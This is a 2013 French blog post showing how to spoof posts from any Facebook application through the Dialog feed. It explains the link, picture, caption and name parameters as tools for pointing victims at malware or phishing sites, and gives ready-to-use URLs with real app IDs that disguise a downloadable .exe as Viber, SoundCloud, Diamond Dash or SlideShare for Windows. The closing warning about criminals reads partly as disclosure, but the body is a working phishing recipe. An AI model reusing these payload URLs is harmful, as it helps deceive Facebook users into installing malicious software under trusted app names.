Vous aimerez peut-être :

Related Posts Plugin for WordPress, Blogger...

21 mai 2013

Spoofer n'importe quelle application Facebook


Spoofer n'importe quelle application Facebook

En 2013, Facebook a changé le mécanisme de stream.publish pour poster des liens et introduit de nouveaux paramètres avec Dialog feed comme expliqué ci-dessous:
paramètre Link: Avec ce paramètre, nous allons inclure notre lien malveillant externe (fichier exe de virus, 0days, le site de phishing, ou tout autre lien malveillant.
 Paramètre de picture: Ce paramètre n'est utilisable que si l'on veut usurper le contenu d'une image. . Paramètre Caption: Ce paramètre permet à un attaquant de choisir de quel site le contenu provient, par exemple: Facebook.com Google.com Skype.com ,...
Paramètre de Name: Ce paramètre produit le titre que nous désirons. Lorsque la victime clique sur ce titre, il sera redirigé à notre site Web malveillant.

Ci dessous l'image qui explique le resultat de cette attack de Spoofing

Spoofer n'importe quelle application Facebook


Voici le code à inserer pour l'application Viber

https://www.facebook.com/dialog/feed?app_id=192454074134796
&link=http://sos-geek.blogspot.com/
&picture=http://www.topandroidapplication.com/wp-content/uploads/2011/08/Viber.png
&name=Viber%20For%20Windows
&caption=Stay%20in%20touch%20with%20your%20friends%20
&description=%20
&redirect_uri=https://facebook.com




Quelques exemples des applications populaires sur Facebook comme ci-dessous:

Diamant Dash: https://www.facebook.com/dialog/feed?app_id=127995567256931&link=http://nmap.org/dist/nmap-6.20BETA1-setup.exe&picture=http://www.topandroidapplication.com/wp-content/uploads/2013/04/diamond-dash.png&name=Diamond%20Dash%20For%20Windows&%20caption=http://facebook.com&description=&%20redirect_uri=https://facebook.com 

SoundCloud: https://www.facebook.com/dialog/feed?app_id=19507961798&link=http://nmap.org/dist/nmap-6.20BETA1-setup.exe&picture=http://www.atpfestival.com/assets/img/soundcloud.png&name=Download%20SoundCloud%20For%20Windows&%20caption=http://soundcloud.com&description=&%20redirect_uri=https://facebook.com

Skype: https://www.facebook.com/dialog/feed?app_id=260273468396&link = https://touch.facebook.com/apps/sdfsdsdsgs Slidshare https://www.facebook.com/dialog/feed?app_id=2490221586&link=%20https://touch.facebook.com/apps/sdfsdsdsgs/&picture=http://www.samsamia.com/wp-content/uploads/2012/11/slideshare-logo-300×300-e1353118471460.png&name=SlideShare%20For%20Windows&%20caption=slidshare.com&description=&%20redirect_uri=https://facebook.com

A noter ces paramètres permettant d'usurper le contenu de n'importe quelle application Facebook qui est toujours non patchées. Cette technique peut être largement utilisé par les Cyber-criminels aux utilisateurs de Facebook pour installer des logiciels malveillants sur leurs systèmes.

BreakSec